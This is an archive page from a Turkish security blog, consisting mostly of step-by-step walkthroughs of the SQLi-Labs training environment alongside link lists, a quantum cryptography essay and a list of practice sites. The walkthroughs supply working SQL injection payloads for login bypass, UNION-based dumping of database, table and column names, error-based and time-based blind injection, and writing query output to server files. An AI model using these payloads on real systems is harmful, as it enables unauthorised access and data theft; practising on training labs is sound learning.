learn arşivleri • CanYouPwnMe! - For Cyber Security Researchers

TR | Sql-i Labs Walkthrough Series 10-15

Enes ERGÜN — Fri, 24 Jun 2016 07:29:28 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

SQL-i Labs 10-15

Merhaba arkadaşlar , bu yazı dizimizde 10-15. alıştırmaları göreceğiz.

Bizim için işler artık biraz zorlaşıcak gibi o yüzden kahvelerinizi eksik etmeyin

Uyarı : Burada yapılan çoğu uygulama belki gerçek hayatta karşınıza bu şekilde kabak(başka hangi kelime ile bu kadar güzel ifade edilir ) gibi çıkmayacaktır.Alıştırmalar tamamen experience ( deneyim ) kazanma üzerine kuruludur.

Önce ki yazılara ulaşmak için :

TR | SQL-i Labs Walkthrough Basic 0-5

TR | SQL-i Labs Series Walkthrough Basic 6-10

Öncelikle şunu da söylemek istiyorum.Yine bir önceki yazılarımızda olduğu gibi sadece bypass yöntemlerini göstereceğiz ve diğer levele geçeceğiz.Siz isterseniz bütün tabloları çekmeye çalışabilirsiniz.Takdir edersiniz ki bütün levellerde bunu yaparsak bizden önce yazıyı okurken siz sıkılırsınız

Anlaştıysak başlayalım.

Level 11 :

Daha önceki levellerimize bakarak burada karşımıza bir login ekranı çıkıyor.Burada bizim bir şekilde buraya login olmamız gerekiyor.Bu konuda bizim en basit payload’ımız neydi ?

"or 1=1 ---+

Bi deneyelim hmmm işe yaramadı sanırım.Neyse biz sadece username kısmına tek tırnak çift tırnak atarak hata verdirmesini sağlayalım.Tek tırnak attığınızda aşağıda ki hatayı alacaksınız.

O zaman bizde payload’ımızı tek tırnak ile deneyelim.

' or 1=1 --+

Bu şekilde girdiğinizde uygulamaya bir şekilde login olduk.Olma sebebimize gelirsek eğer

1=1 eşitliği her zaman True döndüreceğinden dolayı bizi sisteme dahil etti.

Yani şöyle düşünün oraya gerçek bir username password yazsaydık ve bu doğru olsaydı şu şekilde bir operatör ile doğruluğu kontrol edilecekti.

eğer username=cypm and password=123456 == True
yazdır 'Giriş başarılı.'
değilse
yazdır ' Giriş başarılı değil.'

Level 12:

Bu levelimizde ismine bakarsak aslında 11.level ile aynı tek farkı çift tırnak koymamız olacak fakat bunu aşağıda ki şekilde denediğimizde başarılı bir şekilde login olamıyoruz.

 " or 1=1 --+

Bu kısımda tamamen doğaçlama yaparak sql sorgusunun hata verebilmesi için

'"  (Tek tırnak + Çift Tırnak )

payloadını kullanarak hata verdirdim.

Ve orada gördüm ki parantez işaretleri bulunuyor.Yani bu demek oluyor ki kapatmamız gereken bir parantezimiz var.( Şuan belkide alıştırma dışına çıkmış bile olabiliriz )Hemen aşağıda ki payload’ı girdim.

")or 1=1 #

Ve okus pokus septimus severus ( kendisi roma imparatorudur bu arada )

Level 13 :

Geldik Double injection olan kısıma normal bir insan olsak burada kurallara , yönergelere uyarak çift sorgu ile bir şekilde bu leveli bypass edip geçmeyi düşünürdük.Değil mi ?

Ama biz normal miyiz ? Duyamadım ? Evet değiliz.

O yüzden double injection niye yazalım ki ?

Hemen yine sql sorgumuza error verdirtelim.

Gördüğünüz gibi buradada bir parantez var ve bunu kapatmalıyız.Bu arada hatayı

"'

ile verdirttim.

Hemen payloadımızı girelim ve sonuca arkamıza yaslanarak bakalım.

')or 1=1 #

Yaşasın HackerMind!

Level 14 :

Bu level de de double injection isteniyor fakat ben yine niye uğraşayım ki double injection ile ?

Tabi enes durur mu yapıştırmış payload’ı

"or 1=1 #

Level 15:

Bu levelimizde Boolian based yani Bool ifade ile giriş yapmamız isteniyor.Nedir bool ifade ?
Türkçe olarak düşündüğümüzde Doğru ve Yanlış.

Yabancılarda ise True ve False şeklinde.

Detaylı açıklama için : https://tr.wikipedia.org/wiki/Boole%27ca

Yani burada yapmamız gereken aslında level 11 de ki gibi

giriceğimiz bir ifadenin bize True döndürmesi gerekiyor.O yüzden bizim en basit true döndüren payloadımız nedir ?
1 = 1’dir.

O zaman payloadımızı yazalım.

" or 1=1 #

Veeeee aman Allah’ım o da ne ? Login olamadık.

Demek ki neymiş ? Ezbere gitmeyecekmişiz mantığını öğrenecekmişiz.Birde bana güvenmeyecekmişsiniz

Burada ki payload’ımız yukarıda ki payload değil aşağıdakidir.

' or 1=1 #

Not:Ne sizin ne de benim yazıyı okurken/yazarken sıkılmamanız için karşılıklı dialog şeklinde ve biraz laubali şekilde yazmış olabilirim.Eğer bu konu hakkında eleştiriniz vs. var ise yorum atabilir veya mail gönderebilirsiniz.

Bir daha ki yazımızda görüşmek üzere.

TR | Sql-i Labs Walkthrough Series 10-15 Enes ERGÜN

TR | SQL-i Labs Series Walkthrough Basic 6-10

Enes ERGÜN — Wed, 08 Jun 2016 20:16:36 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Merhabalar daha önce 0-5 level arasını şurada ki linkte paylaşmıştık.

TR | SQL-i Labs Walkthrough Basic 0-5

Bugün ise bir seri şeklinde 6-10 level arasını birlikte çözeceğiz.
Level 6 :

Bu levelimiz aslında level 5 ile aynı tek farkı ” ‘ ” kullanmak yerine ” ” ” kullanmamız.

Level 5 için : https://canyoupwn.me/sql-i-labs-walkthrough-basic-0-5

1"+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

Level 7 :
Bu levelde bizden sorgularımızı biz dosyaya aktarmamızı istiyor.Aslında buna mecbur bırakıyor yoksa biz tabi ki basit yolu seçmeyi isteriz.
Burada ki payloadımızda ilk baş bi tek tırnak ile deneme yapalım isterseniz.Biz tek tırnak attığımızda hata vericektir.Doğru bir yolda gidiyor gibi duruyoruz.

select * into dumpfile "hebelehubele.sql"

Bizde şu sorguyu gerçekleştiriyoruz.

1'union select 1,2,3 into dumpfile "hebelehubele.txt"

Yukarıda ki sorguyu kullandığımızda bize hiç bir çıktı vermediğini görüyoruz.Demek ki bi yerlerde hata yapıyoruz.Evet hatanın sebebini buldum fakat bunu deneme yanılma yöntemiyle değil hileye başvurarak buldum.
Nedir bu hile ? : Kaynak kodlarına bakmak.Gerçekte böyle bir senaryo ile karşılaştığınızda bu imkanınız elinizde bulunamayabilir.

Burada sitenin sorgusunun içinden aşağıda ki şekilde çıkmamız gerekiyor.

1')) sorgunuz

Bu şekilde sorgu içinden çıktıktan sonra artık sorgu sonucunu bir dosyaya yazdırabiliriz.

1'))union select 1,2,3  into dumpfile "/tmp/mirkelam.txt"--+

Level 8 :

İlk önce tek tırnak atalım.Gördüğünüz gibi you are in yazısı kayboldu.

Şimdi burada amacımız burada sql injection olduğunu kanıtlamak.Bunun içinde sorgu denemeleri yapıcaz ve sorguyu kontrol edebiliyor muyuz ? Bunu kontrol edicez.

1'and 1=1 --+

Yaptığımızda bize yine you are in yazısını göstericek.Belki kod da bi yanlışık vardır sorguyu yine kontrol edebiliyor muyuz deneyelim.

1'and 1=2 --+

Yukarıda ki payload’ı girdiğimizde you are in yazısı yine kayboldu demek ki neymiş biz sorguyu kontrol edebiliyormuşuz.

Level 9 :

Level 8 e benzer bir yapısı var bu levelinde tek farkla level 8 de 199 gibi id ler girdiğimizde bize hiç bir text dönmüyordu.Fakat level 9 da bu şekilde değil.

?id=500000

yazarsanız hala aynı şekilde durduğunu göreceksiniz.

Burada yine körlemesine dalıyoruz ve şu payloadı yazıyoruz.

?id=1'and sleep(10) --+

Bu payload ı yazıp enterladığınızda sayfa 10 saniye kadar ( fazlada olabilir emin olamadım şimdi ) beklemeye geçicek bu da ne demektir ? Burada sql injection var demektir.

Level 10 :
Bu levelimiz level 9 ile aynıdır.Tek fark ” ‘ ” yerine ” “(çift tırnak) ” kullanıyor oluşumuz.

Payloadımız

1"and sleep(10) --+

TR | SQL-i Labs Series Walkthrough Basic 6-10 Enes ERGÜN

EN | Awesome Learn HTML5

Mustafa Kaan Demirhan — Wed, 25 May 2016 00:18:53 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Articles and standards

Elements

Canvas

Details

Time

Time element guide

WebVTT

First draft from W3C

HTML Imports

Introduction to HTML imports

APIs

Push Notifications

Permissions

Permissions API for the Web by Google

Speech Synthesis

Geolocation

Audio

Cryptography

Media Capture

File

Frame timing

Web Manifest

requestIdleCallback

On Google developers

Semantics

Accessibility

DOM Management

Shadow DOM

Data Binding

Data-binding Revolutions with Object.observe()

Web Components

Client side storage

Performance

Mobile

Communications and interoperability

Web Sockets

WebRTC

Web Workers

Service Workers

WebGL

WebGL Fundamentals

Browser compatibility

Books

Game development

Getting started with HTML5 Game Development from Mozilla Hacks
HTML 5 game development video series by Mozilla
Info, news and tutorials
Over 380 resources on HTML5 game development
Opensource JavaScript game engines
- Pixi.js
- phaser
- MelonJS
- kiwi.js
- Crafty
- PhysicsJS
- Stage.js
- cocos2d

Videos and Keynotes

Websites and resources

Websites

HTML official reference(allows collaborative modification of content like wiki)
HTML5 Rocks (news, tutorials and updates)
HTML5 Hub (developer community including articles, discussions and open projects)
HTML5 Gallery (a showcase of sites using HTML5 markup and API’s)
HTML5 Doctor (tutorials and articles)
HTML5 development guide from MDN
W3C Highlights form June 2014
HTML5 Please (Know when HTML5 feature are ready to use)

Weekly news

Twitter

@html5
@html5rock
@html5gallery
@html5doctor
@GameDevHTML5
@mozhacks
@mozappsdev
@googlechrome

EN | Awesome Learn HTML5 Mustafa Kaan Demirhan

EN | Awesome Learn Perl

Mustafa Kaan Demirhan — Sat, 21 May 2016 23:13:41 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Arg

Benchmarks

Class Builder

CLI

Container

Object::Container

Data Format

Database

Database Drivers

Relational Databases

NoSQL Databases

Date & Time

DevOps Tools

Email

Email::Sender

Event Loops

Exception Handling

File Manipulation

Form Frameworks

Images

List Manipulation

Logging

Module Development

Network

ORM

Package Management

Processes and Threads

Profiling

Protocol

Queueing

Science/Numerics

REST Frameworks

Template Engines

Testing

Testing Frameworks

Test Double

Coverage

Tools

Web Frameworks

Middlewares

Web Frameworks-Like

Web Scraping

Web::Scraper

EN | Awesome Learn Perl Mustafa Kaan Demirhan

TR | Quantum Cryptography

CanYouPwnMe — Sat, 21 May 2016 21:09:13 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Kriptolojinin tam kelime anlamı şifre bilimidir .Çeşitli iletilerin, yazıların belli bir sisteme göre şifrelenmesi, bu mesajların güvenlikli bir ortamda alıcıya iletilmesi ve iletilmiş mesajın deşifre edilmesidir.

Kriptoloji = Kriptografi +Kriptoanaliz .Kriptoloji bilimi kendi içerisinde iki farklı branşa ayrılır. Bunlar Kriptografi; şifreli yazı yazma ve Kriptoanaliz; şifreleri çözme ya da analiz etmedir. Kriptoloji, çok eski ve renkli bir geçmişe sahiptir. Tarihten günümüze kadar, bazı şifreleme teknikleri şunlardır

Bu konuya tam olarak girmeden önce çok kısa olarak klasik kriptloma sistemlerinden bahsetmek istiyorum.Gelin hep beraber inceleyelim.

Klasik Kriptolama yöntemleri:

Sezar Kripto sistemi
Aﬁn Kripto Sistem
Yer Degistirme Kripto Sistemi
Vigenere Kripto Sistem
Pohlig-Hellman ¨Ustel(Exponentiation)Kripto Sistemi
RSA Kripto Sistemi
ElGamal Kripto Sistem

Konuyu örnekle ele alırsak;

Afin Kripto Sistemi Örnek (Tercih nedenim kolay ve anlaşılır olması)

Klasik Bilgisayarlarda Kullanılan Mantık Kapıları

NOT: Girişindeki mantıksal değeri tersine ¸cevirir. Girişteki işaretin lojik 1 seviyesinde olması durumunda çıkış lojik 0 seviyesinde, lojik 0 seviyesinde olması durumunda ise çıkış lojik 1 seviyesinde olur. Tek bitlik bir kapıdır.

AND: 2 bitlik bir kapıdır. Giriş değerlerinin ¸carpımını alır ve sadece girilen iki değerde 1 olduğunda 1 sonucunu verir.

OR: Girilen 2 ya da daha çok değerin toplamın alan kapıdır. Girilen değerlerden biri 1 olduğunda 1 sonucunu verir.

NAND: Girilen değerlerin ¸carpımını alıp sonucun tersini çıktı olarak veren kapıdır. Bu anlamda AND kapısını tersidir. Sadece girilen iki değerde 1 olduğunda 0 değerini verir.

NOR: Girilen iki ya da daha fazla değerin toplamını alıp tersini çıktı olarak veren kapıdır. Bu anlamda OR kapısının tersidir. Sadece girilen tüm değerler 0 olduğunda 1 sonucunu verir.

XOR: Giri¸steki değerler farklı olduğunda 1 sonucu verir. Geriye kalan her durumda 0 sonucunu verecektir.

XNOR: Girişteki değerler aynı olduğunda 1 sonucunu verir bunun dışındaki her durumda 0 sonucunu verecektir.

Temel bilgileri verdikden sonra asıl konumuz olan kuantum bilgisayardan bahsedelim.

Kuantum bilgisayar: Klasik bilgisayarlar bitlerden oluşan hafıza yapısına sahiptir. Her bit 1 veya 0 değerini alabilir. Kuantum bilgisayarları ise kübit(qubit)lerden oluşan seriler içerir. Tek bir qubit 1, 0 veya bu ikisi arasındaki (kuantum çakışması) bir değeri alabilir. Bir kübit (qubit) çifti 4 kuantum çakışması durumunun herhangi birinde, üç kübit (qubit) ise 8 kuantum çakışması durumunun herhangi birinde olabilir. Genel olarak n kübit sahibi bir kuantum bilgisayarı aynı anda 2^n çakışmanın herhangi birinde olabilir. (Normal bilgisayarlar 2^n durumun sadece birinde olurken, bir kuantum bilgisayarı bu durumların hepsinde ya da bir kısmında bulunabilir.) Kuantum bilgisayarları kübitleri (qubit) belirli kuantum mantık kapıları ile düzenleyebilir. Uygulanan bu kapı serilerine kuantum algoritması adı verilir.

Kuantum bilgisayarının olası farkı hakkında; alışıla gelmiş klasik transistörlü elektriksel devre akımı ile işlem yapma esnasında çeşitli veri gecikme süreçleri olduğu için bu bekleme süreci transistör sayısı artıkça ilk elektriksel yapı bir noktadan sonra tekrar yenilenmesi gerekir bu yüzden işlem süreci haliyle uzamaktadır fiber optik bağlantılardaki gibi Kuantum bilgisayarı tüm işlemi ışık hızı sınırında tamamlayabilmesi olasıdır.
bu yazının biraz daha anlamlı olması için kübit tanımını yapmak gerekir.

Kübit(Qubit)= Kuantum bilgisayarlarda bilgi saklama işlemini kuantum ﬁziği kanunlarına tabi olan, kübit (kuantum bit) denilen; atom, elektron, çekirdek ve foton gibi parçacıkların yapması öngörülmektedir.Aslında klasik bilgisayardaki bit ifadesi burada kübit olmuş diyebiliriz.

KUANTUM KRİPTOGRAFİ:

Kuantum şifreleme güvenli iletişim için kuantum mekaniğini kullanır. Gizli dinleyicilerin şifrelenmiş iletilerin içeriğini okumasını önlemek için değişik matematikse matematik teknikleri kullanan geleneksel şifrelemenin aksine, kuantum şifreleme, bilginin/verinin fiziğini temel alır. Gizli dinleme, fiziksel bir nesnenin ölçülmesi olarak görülebilir .Bu durumda ise verinin taşıyıcısı. Birisi kuantum süperpozisyonu veya kuantum dolaşıklığı gibi bir kuantum fenomeni kullanarak, her zaman tüm gizli dinleyicileri tespit edebilen bir iletişim sistemi yapabilir. Çünkü bilginin-verinin kuantum taşıyıcısı üzerinde yapılan ölçümler onu bozar dolayısıyla bu tür girişimler her zaman iz bırakır.

Şimdi diyeceksiniz o kadar laf o kadar söz tamam da nereye bağlanacak bu konu işte olay burada başlıyor…

Kuantum Mantık Kapıları :

-NOT Kapısı
-NOT’ın Karekökü
-QI Kapısı
-QZERO Kapısı
-QONE Kapısı
-QNOT Kapısı
-Pauli-Y Kapısı
-Pauli-Z Kapısı
-QNOT’ın Karekökü Kapısı
-Controlled Kapıları(Kendi içinde gruplara ayrılıyor)
-Hadamard Kapısı

bu mantık kapılarının bazılarında klasik eşiti yoktur bknz:: QNOT’karekökü..

Asimetrik Sistem :
Göndericinin ve alıcının farklı anahtarlar kullandığı kriptosistemlere, asimetrik veya açık anahtarlı sistemler denir.

Simetrik Sistemler:

Simetrik kriptosistemlerde yani gizli anahtarlı kripto sistemlerde hem şifreleme hemde şifre çözme için aynı anahtar kullanılır.

Kuantum kriptografi’de temel prensip tek kullanımlık anahtarlı kriptografi tekniğinin kullanılmasıdır.Kuantum kriptografinin sonuçları olasılığa dayalı olduğu için , kuantum mekaniğine özgü ölçümler kriptosistemler geliştirilmesine uygundur. Böylece eğer veri transferi sırasında sisteme herhangi bir müdahelede bulunulmuşsa, bu bir dinleyici olduğuna işaret eder.Önce gönderici alıcıya anlamsız bir veri gönderir, daha sonra gönderici ve alıcı ellerindeki verileri açıkca karşılaştırır.Veriler arasındaki uyumsuzluk varsa, sisteme müdahale edilmiş yani konuşma dinlenmiş demektir.Bu durumda gönderici alıcıya anlamlı herhangi bir veri göndermeden iletişim sonlanır. Böylece gizli bilgilerin istenmeyen kişilerin eline geçmesi engellenir.
BB84 protokolü:
Kuantum kriptograﬁnin pratik uygulamaları ile ilgili ilk protokol Charles H. Bennett ve Gilles Brassard tarafından 1984 te geli¸stirildi. BB84 adıyla anılan bu protokol, kuantum kriptograﬁ araştırmaları için hala yaygın olarak kullanılıyor.Buradaki esas mantk spin (½) olan parçacıklar ile örneklendirebiliriz.Bilindiği gibi bir parçacağın spini hangi yönde ölçülürse ölçülsün (-½) yada (½) çıkacaktır.Bu durumu incelemek için dört farklı durum kullanılır ve farklı bazlardaki örtüşme maksimum yapılır.Böylece bilginin hangi bazda hazırlandığını gizli tutar.

Kullanım Alanları :

Şuanda sadece üzerinde telefon şirketleri çalışıyor güvenli bir iletişim sağlayabilmek için ama yakın zamanda savunma sanayisine kadar bu konun gelebileceğini görebilmek çok zor değil diye düşünüyorum.

Sonuç : Gizli bilgileri ele geçirmeye çalışan birisinin önce araya giriği daha sonra alıcıya elde ettiği sonuçlara uygun bilgiler gönderdiği durumda neler olabileceğini incelersek.Eğer dinleyici doğru bazı kullanırsa , alıcının kübite yüklediği bilgiyi doğru olarak öğrenecek ve bu doğru bilgiyi alıcıya da gönderecektir.Fakat bu imkansızdıri.Binlerce kübitten oluşan bir anahtardaki tüm bitleri şans eseri doğru bazda ölçmek hayal bile edemedim .

Kuantum kriptografide daha fazla araştırmaya gereksinim duyan çok fazla ilginç açık problem mevcuttur. EPRBE protokolü gibi iki dolaşık foton içeren Kuantum kriptografi protokollerinde Bell eşitsizliği kullanarak veri alışverişine sızmaya çalışan ajanın varlığını hissetmek için, özel bir fonksiyon olan “g” fonksiyonunu belirlemek zorundayız. Ajanın varlığının hissedilebilirliğinin artırımı için dolaşıklık durumunun hazırlanmasının tam olarak araştırılması ve mesafeye ve zamana göre değişim bilgisi gerekmektedir. Kısacası bir protokol olarak güvenliğinin ispatının gerçekleştirilmesi gerekmektedir. BB84 protokolü gibi tek fotonlu Kuantum kriptografi protokollerindeyse boşluktan gelen ataklar da dahil olmak üzere çeşitli tiplerdeki ataklara karşı güvenliğinin daha fazla araştırılması arzu edilen bir durum olacaktır.

Sayısal ağlar üzerinde nakledilecek gizli metinlerin şifre anahtarı, uzaktan etki sayesinde anında istenen yere nakledilebilecektir. Telefon firmaları, bugünkü şifre yöntemlerinden daha güvenilir olan bu yeni yöntemi incelemektedir. Belki yakında bütün elektronik haberleşmeler, uzaklara atlayabilen garip bir hayaletsel bağla yapılacaktır.

TR | Quantum Cryptography CanYouPwnMe

TR | SQL-i Labs Walkthrough Basic 0-5

Enes ERGÜN — Thu, 19 May 2016 23:56:43 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Sqli – Lab Nedir ?

Sqli lab diğer egzersiz ortamlarına nazaran sadece sql injection üzerine odaklanmış bir egzersiz ortamıdır.
Öncelikle bu ortama ulaşmak için : https://github.com/Audi-1/sqli-labs
Yukarıda ki adresden indirmek için

git clone https://github.com/Audi-1/sqli-labs.git

Komutunu kullanabilirsiniz.(Bağımlılık olarak git kurulması gereklidir.)
Veya

wget --no-check-certificate https://github.com/Audi-1/sqli-labs.git

Komutunu kullanabilirsiniz.

Daha sonra db-credits.inc dosyasının içinde ki kendi mysql user,password kısımlarını düzeltiniz.
Daha sonra tarayıcınızdan girip Setup/Reset database for labs linkine tıklayarak kurulumu tamamlayabilirsiniz.Eğer herhangi bir sorun ile karşılaşırsanız çekinmeden [email protected] adresine mail atabilirsiniz.

Not : Bu yazımızda ilk 10 levele değineceğiz.Sadece ilk level de son kısıma kadar gideceğim ve geri kalan levellerde sadece payloadı vereceğim.

SQLi-Labs Page 1 ( Basic )

Sqli Labs 1 :

Bu levelin isminden anlayabiliceğimiz gibi hata bazlı bir enjeksiyon gerçekleştireceğiz.
Ben bu levelde ?id=1 kısmından sonra tek tırnak ile hata vermeye zorladım ve bize hatayı verdi.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'' LIMIT 0,1' at line 1

Bu kısımdan sonra

?id=1'order by 6

gibi kodlarını girdiğimizde herhangi bir işe yaramadığını bizzat deneyimledim.Hatta baya uğraştım diyebiliriz

?id=1'order+by+6# veya ?id=1'order+by+6--+

gibi payloadlar bir işimize yaramadı.
Not : 6 sayısı tamamen sallamasyon sayıdır itibar etmeyiniz.

Bende payload sonuna sıkça kullanılan –+ karakter setini girdim ve order by komutunu yavaş yavaş artırdım.

?id=1'order by 4 --+

Yukarıda ki resim de order by kullanarak 4.kolon da hata aldık.Order by ile ilgili trickimiz neydi ? Hangi sayıda hata veriyorsa mantıken -1 kolon sayısını çekecektir.

Artık 3 kolon çektiğini bildiğimize göre şu sıralamaya uyarak ilerleyebiliriz.

Toplam kolon sayısını bulma.
Vulnerable kolonları ekrana bastırma.
Vulnerable kolonlar sayesinde gerekli bilgileri çekmek.

Şimdi vulnerable(zaafiyet barındıran) kolonları ekrana yansıtalım.

bunun için aşağıda ki payload’ı kullanıyoruz.

?id=-1'union select 1,2,3 --+

Burada union operatörüyle yazıcağımız sql kodlarının hangi kısıma yazacağımızı görüyoruz.Yani aşağıda ki gibi bir kod yazdığımızı düşünürsek

?id=1'union select 1,bizimsqlkodumuz,bizimsqlkodumuz

Hadi şimdi işleri biraz heyecanlandıralım.Database ve user’ı çekelim.

?id=-1'union select 1,database(),user()

Gördüğünüz gibi database ismimiz security , kullanıcımız ise root@localhost

Burada -1 kullanmamızın nedeni 1 idsine sahip bir verimiz var ve sadece onu gösteriyor eğer -1 yapmazsak veriyi çeksekte ekrana bastırmıyor.

Şimdi de tablo isimlerimizi çekelim.

Bunun için payloadımız

-1'union select 1,group_concat(table_name),3 from information_schema.tables--+

Eğer burada group_concat yerine

-1'union select 1,table_name,3 from information_schema.tables--+

bu şekilde bir payload kullansaydık bize sadece tek bir tablo ismini verecekti.Örnek :

Şimdi de sütunlarımızı çekelim

?id=-1'union+select+1,group_concat(column_name),3+from+information_schema.columns--+

Gördüğünüz gibi fazlaca tablo ve sütun bulunuyor.O zaman ne yapalım ? Şuan bulunduğumuz tabloda ki sütunları çekelim değil mi ?

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+

Gördüğünüz gibi tablomuzda ki sütunlar bunlar.
Aynı şekilde tablo isimlerini de bu şekilde çekebilirsiniz.

?id=-1'union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()

Username , password kısımlarını id girerek gördüğümüz için gerikalan kısımlarını pas geçiyoruz.

Level 2:

Bu level ile ilgili :

Bir çok kaynakta

?id=1 ;

şeklinde bir payload yazılmış fakat

Bizim

?id=1 --+

kodumuz da işe yarayacaktır.Nasıl da sahiplendik hemen son bükücümüzü

-1 union select 1,2,3 --+

Level 3:

Bu level şu ana kadar gördüklerimizden biraz farklı bu levelde arkaplanda ki sql kodlarımızda

Aşağıdakine benzer bir kod çalışıyor.

select * from users where userid=(getrequest) \\ Tahminidir.

Burada yapmamız gereken şey “(” işaretini “)” işareti ile bypass edip kendi kodlarımızı çalıştırmak olmalı.Bende bunun için şöyle birşey denedim.

-1')union+select+1,2,3 --+

Şimdi bu kısımda açıklama gereği duyuyorum.

select * from users where userid=('getrequest')' limit 0,1 \\ Tahminidir.

Yukarıda ki kodu “)” karakteri ile aşağıda ki hale getirmiş olduk.

select * from users where userid=('')union select 1,2,3

Level 4 :

Bu levelde yapmamız gereken şey aslında bir önceki level ile aynı fakat burada Single Quotes ( ‘ ) yerine bu kısımda Double Quates ( ” ) kullanmamız.

Payloadımız :

?id=-1")union+select+1,2,3 --+

Level 5 :

İşte belki de en komplike levelimize geldik.Bu levelde adından anlaşılacağı gibi bu levelde 1 sorguda iki sorgu çalıştıracağız.Hemen aklınıza or veya and operatörleri gelmesin biraz daha komplike çünkü adeta bir inception gibi injection yapacağız.

1'+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

Üst kısımda gördüğünüz gibi and ile birlikte select komutu daha sonra from kısmında ise iç içe select komutlarını giriyoruz.Burada aslında security adlı database’i ( veritabanı ( bunu burada neden ayrı bir parantez ile belirttim bilmiyorum ama konuya çok uygun oldu ) ) çekip bunu 0,1 ile limitleyip daha sonra 2 ile çarpıp yuvarlama yapıyoruz.Aslında kod kalabalığından başka birşey değil fakat engellemeyi aşmak için böyle bir yönteme başvuruyoruz.Anlamadınız değil mi ? Bende anlamamıştım beyin baya bir overload olmuş(tu).

TR | SQL-i Labs Walkthrough Basic 0-5 Enes ERGÜN

EN | CTF Lists

Mustafa Kaan Demirhan — Thu, 19 May 2016 21:14:41 +0000

CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Online Games

Others

hackthecause.info
bright-shadows.net
mod-x.co.uk/main.php
scanme.nmap.org
hackertest.net
net-force.nl
securityoverride.org

Webapp Specific

demo.testfire.net
wocares.com/xsstester.php
crackme.cenzic.com
test.acunetix.com
zero.webappsecurity.com

Forensics Specific

computer-forensics.sans.org/community/challenges
forensicscontest.com

Recruiting

praetorian.com/challenges/pwnable
rtncyberjobs.com
0x41414141.com

Paid Training

heorot.net

Downloadable Offline Games

badstore.net
owasp.org/index.php/Category:OWASP_WebGoat_Project
owasp.org/index.php/Owasp_SiteGenerator
Damn Vulnerable Web App
Stanford SecureBench
Stanford SecureBench Micro
irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10